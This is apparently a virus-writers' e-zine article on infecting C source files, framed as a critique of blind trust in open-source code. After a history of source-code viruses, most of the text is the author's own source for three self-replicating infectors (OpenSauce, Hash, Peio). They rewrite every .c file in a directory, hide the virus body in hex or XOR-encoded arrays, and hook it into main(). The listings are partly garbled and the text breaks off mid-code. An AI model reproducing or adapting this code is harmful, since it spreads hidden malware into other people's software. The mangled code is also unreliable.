Join us now and share the malware... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Reflections about the Open Source and Free Software community and their blind believe in the goodness of the source code. by zert 0.- Abstract 1.- Introduction 2.- Precedents 2.1.- DOS viruses, Urphin 2.2.- 1994, SrcVir virus family and Die-Hard virus 2.3.- Compiler libraries' infectors 2.4.- Any scripting language virus code 3.- Why try to infect source code? 4.- OK, but... how? 4.1.- Typical scenario 4.2.- ASM inline approach 4.3.- "Quine" approach 4.4.- Future developments 5.- Conclusions 6.- Related links 0.- Abstract In this article we'll talk about the possibilities of infection of source code files, the precedents that have been in this subject and the future developments that could happen. The text will be enclosed with examples in C, as "proofs of concept" of the explained details. Besides, virus development techniques for source code through other ways will be presented, from a less practical point of view and showing the main steps for its programming. 1.- Introduction As the Free Software Foundation famous song [1] says, nowadays a lot of people are joining the Free Software movement or other variants (more commercial) as the Open Source movement. The title of this article wants to wink at this song's chorus ("Join us now and share the software, you'll be free, hackers, you'll be free..."), showing the possibility of this distribution capacity which has taken the source code in these kind of environments, could be used in order to hand out again viral code. Many of us are starting to develop an almost blind faith in those developers of open source programs because the code is visible, it will be much more difficult to be cheated and the possibility to insert not wanted effects into these programs will be reduced. If we think about it, when we go to a magic show, many of the magic tricks need a curtain, a wall or something to hide how we are being fooled, but there are many other tricks that are made face in our face, without using anything else but the hands and, even like this, we fall and we believe them. Something similar could happen with open source programs: the code is there and everybody can see and examine it, however, only a very few do it (who has audited the *whole* code which is running through his box?). And, besides, it would be occasionally possible to obfuscate the code to make highly difficult to be understood and to be able to insert hidden elements, not wanted by the user of that code. Source code viruses never have been a real threat, basically because, until near today, to interchange programs distributing the source code was something very unusual outside a too geek environment. The viruses have had their natural habitat within the executable programs, typically binaries, that have been distributed hand by hand during all these years. Although P2P networks have returned to relaunch the massive interchange of binaries, it seems to be that this approach is going progressively down and than what rules right now is to think about an approach of the type virus + worm, using different workstations or servers like infection vectors. Nowadays, interchanging programs using the source code is not something of computer freaks. In the world of Free Software and Open Source, this is the most common way to distribute the code. Usually the code is audited at least by the author of itself, although there are a lot of myths about this. Anyway, some cases have happened in which the official FTP server has been cracked and the original source of the code has been changed [3] [4]. In those occasions the introduced code was very obvious, but a more subtle attack could have been tried. I don't know whether in a further P2P networks will be full of tarballs with the source code of a lot of programs or whether auditing the source code will be an automatizable task (where it would appear a new battle scene between auditors and malware writers), but the verifiable fact is that in this very moment the interchange of source code is increasing and, because of it, it is necessary to analyse the convenience of its use as infection vector. 2.- Precedents Up to now, a few and shy infectors have been developed with the target of infecting the source code. We are going to explain the reasons: the source code has not been a goog infection method until the irruption of the "open source revolution" on the curren scene. 2.1. DOS viruses, Urphin In the distant pass age of DOS viruses, Urphin virus [5] already thought of infecting source code as a spread method. This behaviour was not strange at all: once came out, it remained resident (31h service of int 21h), waiting for the execution of the program TPC.EXE (Turbo Pascal Compiler) and it was at that moment when it intercepted the .PAS files which contain the source code of the programs in Pascal. Once found the .PAS file, it looked for the word "BEGIN", which indicates the beginning of a code block in Pascal, an it added a hexadecimal dump of its code together with the code in Pascal to be executed. When the file was closed, the virus eliminated the source code just inserted in order to make clean the infected source code after having generated the executable binary. 2.2.- 1994, SrcVir virus family and Die-Hard virus In many web pages in which the history of computer [6] viruses is explained, SrcVirus family is mentioned. It appeared in 1994 together with a stream of new viruses with strange targets and behaviours up to that date. The aim of this virus family was mainly to infect source code files written in C and Pascal, in similar way to the mentioned Urphin. The same year, it was programmed and released another virus which infected the source code, the Die-Hard virus [7]. This virus is quite standard (COM and EXE infector in DOS), except for one feature: it looks for .ASM and .PAS files, assembly and Pascal source code respectively, in order to add a dump of its code. 2.3.- Compiler libraries' infectors There are viruses which have the target of infecting OBJ and LIB files [8] in order to add its code to modules or libraries that will be used afterwards to be linked with executable code. The infected files in this way would act just as "carriers", waiting for am executable to link with these modules or libraries and to go on spreading the virus. In this way, the executable files would not infect the executable files their self, so that it wouldn't be the risk of self infection and it should not be observed in the virus code, and the infected files are useless until its code is included into a executable, remaining in a "latent" state until that happens. 2.4.- Any scripting language virus code Obviously, any viruses which is written in a scripting language and which has the target of infecting other scripts, will be an infector which copies its source code in the guest file. There are several approaches to this kind of virus in Perl or Shell Scripts [9] [10] and countless Internet worms written in Visual Basic Script and other kinds of scripting languages. 3.- Why try to infect source code? As we have mentioned before, it's possible to be an expanding field and several factors prove it: * The increasing interest about Operating Systems as GNU/Linux and *BSD generates an users community whose main value is the source code and this one is user as change coin. Some of these new users are far away from the original idea of a UNIX hacker, and they become less technical (using the computer as a quite modern washing machine). * The growing interest of Governments and Public entities in using open source software in order to increase its security. Open source is not itself (inherently) more secure than close source software if appropriate measures are not taken. There are a lot of myths about this [2], apart from many attempts from Microsoft in order to deceive the consumer with half the truth [13]. * Some program demand to be compiled in each computer separately, either because it is free software that links with property libraries or codecs, or because it can be an enormous difference between the generic version for i386 and this one compiled in the specific computer. This fact demands a development environment in more computers. The paradigmatic example of this case is the Mplayer multimedia player. 4.- OK, but... how? 4.1.- Typical scenario Bob is a young sysadmin fascinated by wireless networks. His knowledge about computer networks are advanced, but he has no idea about programming further a few simple shell scripts. At a very enjoyable wardriving evening, when he and his friend Dave are listening to Massive Attack and pursue among routers of a local company, Bob is astonished of the great program that Dave has to scan wireless networks. Eager, he asks him the URL to download it without further delay: wget http://packetstormsecurify.nl/sniffers/wireless/wlanthrax-0.6.9.tar.gz tar xzf wlanthrax-0.6.9.tar.gz cd wlanthrax-0.6.9 ./configure make make install (advisory: http://packetstormsecurify.nl doesn't exist but it could be bought in a reasonable price. Any resemblance with the coincidence, is real truth) Yeah! The program is working and the networks are surrending as scared rats, tons of adrenaline! like in the old times! What poor Bob doesn't know is that this tarball contained malware and now he has it running through the digital veins of his laptop. The same thing had happened to Bob before, and from that time he never do this as root user. Obviously, "make install" command wouldn't ever work as a normal user, but the tool would go on being executable and usable. Clever boy, but even from a normal user account, we could try to infect the whole source code that we can reach with those privileges, which can be enough. Do you think this situation is improbable? How many times have we done tar xzf && ./configure && make && make install blindly? I admit that sometimes I've installed software in that way O;-D 4.2.- ASM inline approach Every virus coder knows reverse engineering tools which provide a high quality disassemblies. Quickly come to my mind names as IDA disassembler or even the disassembly view mode of HIEW (Hackers View). The port for UNIX of HIEW, BIEW (which is really his "small brother") also supports the disassembly view and we can see easily the source code in assembler of any program. An ASM inline approach to infect source files should implement a small disassembler of its own code, to be able to include it in the source code file. If we take as a reference the source code written in C used in GNU/Linux, we should create a disassembler for our code with AT&T syntax, and include this code in a function: int virus() { __asm__( "pusha\n\t" "call 0x8048086\n\t" [...] "mov $0x1,%%eax\n\t" "int $0x80" ); } To obtain that disassembly we can use the Free Software philosophy and get the code that does that work in BIEW or objdump tools. The main problem of doing in that way is that the disassembler would take up a very important part of our virus code, so we can discard this and try to call that tools directly: if our aim is to infect the source code, we can suppose that the infected computer is a development workstation which can have those tools installed. Using the syscall "execve" in UNIX we could execute one of those tools and generate the printout in a son process. An optimised version of this point of view would check whether there are some of the most common tools which could make this job. Pros: * We don't need to think too much, there is everything done, we have to join the pieces ;-) * We are still programming in assembler, controlling each detail. Contras: * It is not "discreet" indeed. * Being assembler, we lose the inherent multiplatform feature of most of the source code. * The disassembly process can sometimes be too troublesome. 4.3.- "Quine" approach A "quine" is a program that generates its own source code *without* reading its own code. It have been done international programming championships of these peculiar proggies, all of them in a extreme -freak atmosphere. There are several ways to do quines, some very complicated and very elegant others, but the most functional form, in my humble opinion, is using arrays of chars. In fact, I remained very surprised after doing my first quine, because when I saw the rest were many very different, but the one that made Ken Thompson was practically identical, although a little less complicated: the main idea is to have the source code in an array of chars to be able to do the following thing: printf("char array[] = \"%s\";" array); With that approach we break the vicious circle that propose quines when you want to print out your own code (doing printf("printf(\"printf(\"... does not seem to be a good approach;-D). A time later I discovered an authentic jewel of computer science [11] when I saw the problem that proposed Thompson in its famous talk "Reflections on Trusting Trust" when he won the ACM Award. Is amazing to understand the implications of that text, and is surprising to see an authentic guru like Ken Thompson speaking like a malware coder };-) At the moment, the issue explained does not have a very clear solution and seems to be a headache without a simple solution [12]. Well, if we focus in this main point, we can see how is necessary an array of chars that contains the code of the program. It is here where the greater differences can arise. Thompson created its array one by one separating chars of the following form: char s[] = { '\t', '0', '\n', '}', ';', '\n', '\n', 'm', 'a', 'i', 'n', '(', ')', '\n', ... 0 }; In my initial approach I saw that this, in adition of being quite strange, was too obvious, that is, is shown clearly that the content of that array is source code written in C. Because of that, I used another annotation to keep each char in a non so obvious way: char s[] = { 0x6D, 0x61, 0x69, 0x6E, 0x28, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x69, 0x6E, 0x74, 0x20, 0x69, 0x3B, 0x0D, 0x0A, 0x09, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x22, 0x63, 0x68, 0x61, 0x72, 0x20, ... 0 }; The immediate goal was fulfilled: that does not seem C source code to eyes of somebody little familiarized with ASCII table. Nevertheless, this way to define the array increased too much the size of the code, it was necessary to think a way to reduce it. First which I thought to do that was to duplicate the space in the executable code, but to reduce to half the space in the source code, creating an array as this one: char s[] = "6D61696E2829207B0D0A69..."; Doing it this way I am using much less space in C source code. The bad news are that now I use 2 bytes to represent each to char within my array (damn!!). We cannot use printf() to print that array in the host code, we must do something similar to this: int i; char nibblechar, nibble[2]; for(i=0;i <-opensauce.c---------------------------------------------------------------> <---------------------------------------------------------------------------> /* * OpenSauce * * A trial to infect source code * zert * */ #include #include #include #include #include #include #include #include #include #include void virus(); int main(int argc, char *argv[]) { virus(); } void virus() { int i, hd, fd, readbyte, writebyte, posmain, posbuffer; DIR *dd; struct dirent *dirp; char nibble[2], nibblechar, *readbuffer, *writebuffer, *readmain, *writemain, *bufname, *buffer; char charinclude[] = "23696e636c756465203c737464696f2e683e0a23696e636c756465203c7374646c69622e683e0a23696e636c756465203c7379732f737461742e683e0a23696e636c756465203c756e697374642e683e0a23696e636c756465203c66636e746c2e683e0a23696e636c756465203c74696d652e683e0a23696e636c756465203c646972656e742e683e0a23696e636c756465203c656c662e683e0a23696e636c756465203c7379732f74797065732e683e0a23696e636c756465203c7379732f776169742e683e0a0a766f696420766972757328293b0a0a"; char charvirus[] = "0a766f69642076697275732829207b0a2020696e7420692c2068642c2066642c2072656164627974652c207772697465627974652c20706f736d61696e2c20706f736275666665723b0a2020444952202a64643b0a202073747275637420646972656e74202a646972703b0a202063686172206e6962626c655b325d2c206e6962626c65636861722c202a726561646275666665722c202a77726974656275666665722c200a202020202020202a726561646d61696e2c202a77726974656d61696e2c202a6275666e616d652c202a6275666665723b0a"; char charvirusend[] = "0a20206464203d206f70656e64697228222e22293b0a20207768696c65282864697270203d207265616464697228646429293e3029200a202020206966282868643d6f70656e28646972702d3e645f6e616d652c204f5f524457522c203029293e3d3029207b0a ... "; /* scan for hosts in current dir */ dd = opendir("."); while((dirp = readdir(dd))>0) if((fd=open(dirp->d_name, O_RDWR, 0))>=0) { /* is a C source file? */ if(!(strcmp(dirp->d_name+strlen(dirp->d_name)-2,".c"))|| !(strcmp(dirp->d_name+strlen(dirp->d_name)-2,".C"))) { /* searching infection mark... */ lseek(fd, -30, SEEK_END); bufname = (char *)malloc(30); readbyte = read(fd, bufname,30); if((strstr(bufname, "/* sauce! */")<=0)) { /* infection mark not found */ /* searching main() function... */ lseek(fd, 0, SEEK_SET); posmain = posbuffer = 0; buffer = (char *)malloc(1024); while((readbyte=read(fd,buffer,1024))>0) { if( ((posbuffer=(int)strstr(buffer,"\nmain("))>0) || ((posbuffer=(int)strstr(buffer,"\nint main("))>0) || ((posbuffer=(int)strstr(buffer,"\nvoid main("))>0) || ((posbuffer=(int)strstr(buffer,"\nmain ("))>0) || ((posbuffer=(int)strstr(buffer,"\nint main ("))>0) || ((posbuffer=(int)strstr(buffer,"\nvoid main ("))>0) ) { break; } posmain += readbyte; } if(posbuffer>0) { posmain += ((int)posbuffer-(int)buffer); lseek(fd, posmain, SEEK_SET); read(fd, buffer, 80); if((posbuffer = (int)strstr(buffer,"{\n"))>0) posmain += 2 + ((int)posbuffer-(int)buffer); else posmain = -1; } else posmain = -1; if(posmain>0) { /* let's infect! */ lseek(fd, 0, SEEK_SET); writebyte = strlen(charinclude) / 2; readbuffer = (char *)malloc(writebyte); writebuffer = (char *)malloc(writebyte); writebuffer = (char *)malloc(writebyte); for(i=0;i0) { lseek(fd, -readbyte, SEEK_CUR); write(fd, writebuffer, writebyte); writebyte = read(fd, writebuffer, writebyte); lseek(fd, -writebyte, SEEK_CUR); write(fd, readbuffer, readbyte); } lseek(fd,-readbyte,SEEK_CUR); write(fd,writebuffer,writebyte); /* call virus from main() */ writebyte = strlen(charinclude) / 2; lseek(fd, posmain+writebyte, SEEK_SET); writebyte = strlen("\n virus();\n"); readmain = (char *)malloc(writebyte); writemain = (char *)malloc(writebyte); strcpy(writemain,"\n virus();\n"); while((readbyte=read(fd,readmain,writebyte))>0) { lseek(fd,-readbyte,SEEK_CUR); write(fd,writemain,writebyte); writebyte=read(fd,writemain,writebyte); lseek(fd,-writebyte,SEEK_CUR); write(fd,readmain,readbyte); } lseek(fd,-readbyte,SEEK_CUR); write(fd,writemain,writebyte); /* copy virus function at EOF */ lseek(fd, 0, SEEK_END); for(i=0;i <-end of opensauce.c--------------------------------------------------------> <---------------------------------------------------------------------------> The code is not a jewel of the programming science, but it's useful to show what it wanted and in addition works (more or less). In the "charvirusend" array many lines have been suppressed not to fatten unnecessarily this text (if you want a functional version of the code, look for it in 29a #7 e-zine). The rest of code is quite trivial: 1) Search files in the current directory: open the directory with opendir(), read each one of its entries with readdir() and close it with closedir(). 2) Once we have a possible victim, we verify thus if is a ".c" or ".C" file, and if it has been already infected (if contains "/* sauce * /" infection mark) and if it is a C source file with a main() function. 3) If all the specified in the previous point has been fulfilled, we come to infect, copying the includes and the declaration of the virus() function in the beginning (charinclude), adding a call to this function within main(), and generating at the end of the code the virus() function virus() (using "charvirus" and "charvirusend" in addition to a few calls to write() to define arrays). 4) Once finished the infection, we close the file and the directory, because we just infect one file each time. 5) virus() function ends and we return to the original code, and everything works as it would have to work. Let's see another example of this type of virus, something more evolved: <---------------------------------------------------------------------------> <-hash.c--------------------------------------------------------------------> <---------------------------------------------------------------------------> /* * Hash, * * quine-based source code infector. * zert * */ #include #include #include #include #include #include void init_hash(); int main(int argc, char *argv[]) { init_hash(); } void init_hash() { int i, j, fd, size, mpos, ipos, page, ihole, thole, bhole, ehole; struct dirent *dir; DIR *d; void *ptr; char hashinc[] = "\n#include \n#include \n#include \n#include \n#include \n#include \n\nvoid init_hash();\n"; char hashbeg[] = "\nvoid init_hash()\n{\n\tint i, j, fd, size, mpos, ipos, page, \n\tihole, thole, bhole, ehole; struct dirent *dir; DIR *d;\n\tvoid *ptr;\n\tchar hashinc[] = \""; char hashend[] = "\tchar *buf;\n\n\td = opendir(\".\");\n\twhile((dir = readdir(d))>0)\n\t\tif(!(strcmp(dir->d_name+strlen(dir->d_name)-2,\".c\"))||\n\t\t !(strcmp(dir->d_name+strlen(dir->d_name)-2,\".C\"))) \n\t\t\tif((fd=open(dir->d_name, O_RDWR, 0))>=0)\n\t\t\t{\n\t\t\t\tsize = lseek(fd, 0, SEEK_END);\n\t\t\t\tptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0);\n\t\t\t\tif( (!strstr(ptr,\"init_hash\")) &&\n\t\t\t\t ( ((mpos=(int)strstr(ptr,\"\\nmain(\"))>0) ||\n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nint main(\"))>0) ||\n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nvoid main(\"))>0) || \n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nmain (\"))>0) ||\n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nint main (\"))>0) ||\n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nvoid main (\"))>0) ) )\n\t\t\t\t{\n\t\t\t\t\tmpos = (int)strstr((void *)mpos, \";\\n\");\n\t\t\t\t\tmpos -= (int)--ptr;\n\t\t\t\t\tif( !(ipos = (int)strstr(++ptr, \"#include <\")) )\n\t\t\t\t\t{\n\t\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\tpage = 3 * (int)sysconf(_SC_PAGESIZE);\n\t\t\t\t\tftruncate(fd, size+page);\n\t\t\t\t\tptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0);\n\t\t\t\t\tipos = (int)strstr(ptr, \"#include <\");\n\t\t\t\t\tipos = (int)strstr((void *)ipos, \"\\n\\n\");\n\t\t\t\t\tipos -= (int)ptr;\n\t\t\t\t\tihole = strlen(hashinc);\n\t\t\t\t\tfor(i=(size-ipos)/ihole;i>=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole);\n\t\t\t\t\tmemcpy(ptr+ipos, hashinc, ihole);\n\t\t\t\t\tmpos += ihole;\n\t\t\t\t\tbuf = (char *)malloc(20*sizeof(char));\n\t\t\t\t\tstrcpy(buf,\"\\n\\tinit_hash();\");\n\t\t\t\t\tthole = strlen(buf);\n\t\t\t\t\tfor(i=(size+ihole-mpos)/thole;i>=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole);\n\t\t\t\t\tmemcpy(ptr+mpos, buf, thole);\n\t\t\t\t\tbhole = strlen(hashbeg);\n\t\t\t\t\tmemcpy(ptr+size+ihole+thole, hashbeg, bhole);\n\t\t\t\t\tbuf = (char *)malloc(100*sizeof(char)+strlen(hashinc));\n\t\t\t\t\tfor(i=0,j=0;i0) if(!(strcmp(dir->d_name+strlen(dir->d_name)-2,".c"))|| !(strcmp(dir->d_name+strlen(dir->d_name)-2,".C"))) if((fd=open(dir->d_name, O_RDWR, 0))>=0) { size = lseek(fd, 0, SEEK_END); ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0); if( (!strstr(ptr,"init_hash")) && ( ((mpos=(int)strstr(ptr,"\nmain("))>0) || ((mpos=(int)strstr(ptr,"\nint main("))>0) || ((mpos=(int)strstr(ptr,"\nvoid main("))>0) || ((mpos=(int)strstr(ptr,"\nmain ("))>0) || ((mpos=(int)strstr(ptr,"\nint main ("))>0) || ((mpos=(int)strstr(ptr,"\nvoid main ("))>0) ) ) { mpos = (int)strstr((void *)mpos, ";\n"); mpos -= (int)--ptr; if( !(ipos = (int)strstr(++ptr, "#include <")) ) { munmap(ptr, size); break; } munmap(ptr, size); page = 3 * (int)sysconf(_SC_PAGESIZE); ftruncate(fd, size+page); ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0); ipos = (int)strstr(ptr, "#include <"); ipos = (int)strstr((void *)ipos, "\n\n"); ipos -= (int)ptr; ihole = strlen(hashinc); for(i=(size-ipos)/ihole;i>=0;i--) memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole); memcpy(ptr+ipos, hashinc, ihole); mpos += ihole; buf = (char *)malloc(20*sizeof(char)); strcpy(buf,"\n\tinit_hash();"); thole = strlen(buf); for(i=(size+ihole-mpos)/thole;i>=0;i--) memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole); memcpy(ptr+mpos, buf, thole); bhole = strlen(hashbeg); memcpy(ptr+size+ihole+thole, hashbeg, bhole); /* declaracion de arrays y arrays */ buf = (char *)malloc(100*sizeof(char)+strlen(hashinc)); for(i=0,j=0;i <-end of hash.c-------------------------------------------------------------> <---------------------------------------------------------------------------> In this example, hashes are in plain text and correspond to necessary format strings to generate each code lines for the infection. In spite of their size, hashes will occupy less enough within the executable program, because all the escape characters will be reduced to one byte each. As a counterpart, we will have to introduce the necessary code to regenerate both chars that specify each escape character solely (translating just '\t', '\n', '\\' and '\"'). All the remaining code are byte copies within the memory address where the file resides, by using memcpy(). The use of mmap() and memcpy() instead of open(), write() and lseek() speeds up the modification of files enormously. Finally, the "Peio" infector uses the same techniques that "Hash", but in this case hashes are XORed, reason why escape characters like '\t' or '\n' can be used without having to indicate it specifically. This way, the size of the hash array is reduced considerably, in addition to not needing the code that translates to two bytes each escape character. <---------------------------------------------------------------------------> <-peio.c--------------------------------------------------------------------> <---------------------------------------------------------------------------> /* * Peio, * * source code infector XORing hashes. * zert * */ #include #include #include #include #include #include void init_hash(); int main(int argc, char *argv[]) { init_hash(); } void init_hash() { int i, j, fd, size, mpos, ipos, page, ihole, thole, bhole, ehole; struct dirent *dir; DIR *d; void *ptr; char hashinc[] = "Š£éîãìõäå 1/4óôäéï(r)è3/4Š£éîãìõäå 1/4óùó¯óôáô(r)è3/4Š£éîãìõäå 1/4óùó¯ííáî(r)è3/4Š£éîãìõäå 1/4õîéóôä(r)è3/4Š£éîãìõäå 1/4äéòåîô(r)è3/4Š£éîãìõäå 1/4æãîôì(r)è3/4ŠŠöïéä éîéôßèáóè¨(c)" Š"; char hashbeg[] = "Šöïéä éîéôßèáóè¨(c)ŠûŠ‰éîô é¬ ê¬ æä¬ óéúå¬ íðïó¬ éðïó¬ ðáçå¬ Š‰éèïìå¬ ôèïìå¬ âèïìå¬ åèïìå" óôòõãô äéòåîô ªäéò" ÄÉÒ ªä"Š‰öïéä ªðôò"Š‰ãèáò èáóèéîãÛÝ 1/2 ¢"; char hashend[] = "‰ãèáò ªâõæ"ŠŠ‰ä 1/2 ïðåîäéò¨¢(r)¢(c)"Š‰÷èéì娨äéò 1/2 òåáääéò¨ä(c)(c)3/4°(c)Š‰‰é模¨óôòãíð¨äéò­3/4äßîáíå"óôòìåî¨äéò­3/4äßîáíå(c)­²¬¢(r)ã¢(c)(c)üüŠ‰‰ ¡¨óôòãíð¨äéò­3/4äßîáíå"óôòìåî¨äéò­3/4äßîáíå(c)­²¬¢(r)â(c)(c)(c) Š‰‰‰é樨æä1/2ïðåî¨äéò­3/4äßîáíå¬ ÏßÒÄ×Ò¬ °(c)(c)3/41/2°(c)Š‰‰‰ûŠ‰‰‰‰óéúå 1/2 ìóååë¨æä¬ °¬ ÓÅÅËßÅÎÄ(c)"Š‰‰‰‰ðôò 1/2 ííáð¨ÎÕÌ̬óéúå¬ÐÒÏÔßÒÅÁĬÍÁÐßÐÒÉÖÁÔŬæ䬰(c)"Š‰‰‰‰éæ¨ ¨¡óôòóôò¨ðôò¬¢éîéôßèáóè¢(c)(c) ¦¦Š‰‰‰‰ ¨ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîíáé(c)(c)3/4°(c) üüŠ‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîéîô íáé(c)(c)3/4°(c) üüŠ‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîöïéä íáé(c)(c)3/4°(c) üü Š‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîíáéî ¨¢(c)(c)3/4°(c) üüŠ‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîéîô íáéî ¨¢(c)(c)3/4°(c) üüŠ‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîöïéä íáéî ¨¢(c)(c)3/4°(c) (c) (c)Š‰‰‰‰ûŠ‰‰‰‰‰íðïó 1/2 ¨éîô(c)óôòóôò¨¨öïéä ª(c)íðïó¬ ¢"Üî¢(c)"Š‰‰‰‰‰íðïó ­1/2 ¨éîô(c)­­ðôò"Š‰‰‰‰‰éæ¨ ¡¨éðïó 1/2 ¨éîô(c)óôòóôò¨""ðôò¬ ¢£éîãìõäå 1/4¢(c)(c) (c)Š‰‰‰‰‰ûŠ‰‰‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Š‰‰‰‰‰‰âòåáë"Š‰‰‰‰‰ýŠ‰‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Š‰‰‰‰‰ðáçå 1/2 ³ ª ¨éîô(c)óùóãïîæ¨ßÓÃßÐÁÇÅÓÉÚÅ(c)"Š‰‰‰‰‰æôòõîãáôå¨æä¬ óéúå"ðáçå(c)"Š‰‰‰‰‰ðôò 1/2 ííáð¨ÎÕÌ̬óéúå"ðáçå¬ÐÒÏÔßÒÅÁÄ"ÐÒÏÔß×ÒÉÔŬÍÁÐßÓÈÁÒÅĬæ䬰(c)"Š‰‰‰‰‰éðïó 1/2 ¨éîô(c)óôòóôò¨ðôò¬ ¢£éîãìõäå 1/4¢(c)"Š‰‰‰‰‰éðïó 1/2 ¨éîô(c)óôòóôò¨¨öïéä ª(c)éðïó¬ ¢ÜîÜî¢(c)"Š‰‰‰‰‰éðïó ­1/2 ¨éîô(c)ðôò"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèéîã(c)"é""(c)Š‰‰‰‰‰‰èáóèéîãÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèâåç(c)"é""(c)Š‰‰‰‰‰‰èáóèâåçÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰éèïìå 1/2 óôòìåî¨èáóèéîã(c)"Š‰‰‰‰‰æïò¨é1/2¨óéúå­éðïó(c)¯éèïìå"é3/41/2°"é­­(c) Š‰‰‰‰‰‰íåíãðù¨ðôò"éðïó"éªéèïìå"éèïìå¬ ðôò"éðïó"éªéèïìå¬ éèïìå(c)"Š‰‰‰‰‰íåíãðù¨ðôò"éðïó¬ èáóèéî㬠éèïìå(c)"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèéîã(c)"é""(c)Š‰‰‰‰‰‰èáóèéîãÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰íðïó "1/2 éèïìå"Š‰‰‰‰‰âõæ 1/2 ¨ãèáò ª(c)íáììï㨲°ªóéúåïæ¨ãèáò(c)(c)"Š‰‰‰‰‰óôòãðù¨âõ欢ÜîÜôéîéôßèáóè¨(c)"¢(c)"Š‰‰‰‰‰ôèïìå 1/2 óôòìåî¨âõæ(c)"Š‰‰‰‰‰æïò¨é1/2¨óéúå"éèïìå­íðïó(c)¯ôèïìå"é3/41/2°"é­­(c) Š‰‰‰‰‰‰íåíãðù¨ðôò"íðïó"éªôèïìå"ôèïìå¬ ðôò"íðïó"éªôèïìå¬ ôèïìå(c)"Š‰‰‰‰‰íåíãðù¨ðôò"íðïó¬ âõæ¬ ôèïìå(c)"Š‰‰‰‰‰âèïìå 1/2 óôòìåî¨èáóèâåç(c)"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå¬ èáóèâåç¬ âèïìå(c)"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèéî㬠éèïìå(c)"Š‰‰‰‰‰âèïìå "1/2 éèïìå"Š‰‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèâåçÛÝ 1/2 Ü¢¢(c)"Š‰‰‰‰‰âèïìå "1/2 ²²"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèâåç(c)"é""(c)Š‰‰‰‰‰‰èáóèâåçÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèâåç¬ óôòìåî¨èáóèâåç(c)(c)"Š‰‰‰‰‰âèïìå "1/2 óôòìåî¨èáóèâåç(c)"Š‰‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèåîäÛÝ 1/2 Ü¢¢(c)"Š‰‰‰‰‰âèïìå "1/2 ²²"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ óôòìåî¨èáóèåîä(c)(c)"Š‰‰‰‰‰âèïìå "1/2 óôòìåî¨èáóèåîä(c)"Š‰‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"Üî¢(c)"Š‰‰‰‰‰âèïìå "1/2 ³"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèåîä(c)"é""(c)Š‰‰‰‰‰‰èáóèåîäÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰åèïìå 1/2 óôòìåî¨èáóèåîä(c)"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ åèïìå(c)"Š‰‰‰‰‰íóùîã¨ðôò¬ óéúå"ðáçå¬ ÍÓßÓÙÎÃ(c)"Š‰‰‰‰‰íõîíáð¨ðôò¬ óéúå"ðáçå(c)"Š‰‰‰‰‰æôòõîãáôå¨æä¬ óéúå"éèïìå"ôèïìå"âèïìå"åèïìå(c)"Š‰‰‰‰ý åìó劉‰‰‰ûŠ‰‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Š‰‰‰‰ýŠ‰‰‰ýŠýŠ"; char *buf; d = opendir("."); while((dir = readdir(d))>0) if(!(strcmp(dir->d_name+strlen(dir->d_name)-2,".c"))|| !(strcmp(dir->d_name+strlen(dir->d_name)-2,".C"))) if((fd=open(dir->d_name, O_RDWR, 0))>=0) { size = lseek(fd, 0, SEEK_END); ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0); if( (!strstr(ptr,"init_hash")) && ( 